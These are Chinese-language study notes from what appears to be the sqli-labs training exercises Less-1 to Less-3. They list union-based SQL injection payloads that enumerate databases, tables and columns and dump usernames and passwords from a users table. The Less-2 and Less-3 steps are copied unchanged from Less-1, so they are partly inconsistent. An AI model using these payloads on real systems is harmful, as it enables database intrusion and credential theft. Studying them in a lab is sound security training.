sql注入练习
Less-1
1.http://112.126.63.198/Less-1/?id=1’ 判断是否存在sql注入(字符型注入)
2.http://112.126.63.198/Less-1/?id=1’ order by 3–+ 查询有多少列
3. http://112.126.63.198/Less-1/?id=0’union select 1,2,3判断回显位置
3。http://112.126.63.198/Less-1/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ 查询数据库名信息
4.http://112.126.63.198/Less-1/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)–+查询表名
5.select group_concat(column_name) from information_schema.columns where table_name=‘users’ 查询security中users内的列名
select group_concat(password) from security.users
select group_concat(username) from security.users
获得用户名,密码
Less-2
1.http://112.126.63.198/Less-1/?id=1’ 判断是否存在sql注入(报错,存在注入点)(数值型注入)
2.http://112.126.63.198/Less-1/?id=1’ order by 3–+ 查询有多少列
3. http://112.126.63.198/Less-1/?id=0’union select 1,2,3判断回显位置
3。http://112.126.63.198/Less-1/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ 查询数据库名信息
4.http://112.126.63.198/Less-1/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)–+查询表名
5.select group_concat(column_name) from information_schema.columns where table_name=‘users’ 查询列名
select group_concat(password) from security.users
select group_concat(username) from security.users
得到用户名,密码
Less-3
1.http://112.126.63.198/Less-1/?id=1’ 判断是否存在sql注入(报错,存在注入点)
?id=1 and 1=2 未报错,不是数值型
2.http://112.126.63.198/Less-1/?id=1’ order by 3–+ 查询有多少列
3. http://112.126.63.198/Less-1/?id=0’union select 1,2,3判断回显位置
3。http://112.126.63.198/Less-1/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+ 查询数据库名信息
4.http://112.126.63.198/Less-1/?id=0’ union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)–+查询表名
5.select group_concat(column_name) from information_schema.columns where table_name=‘users’ 查询列名
select group_concat(password) from security.users
select group_concat(username) from security.users
获得用户名,密码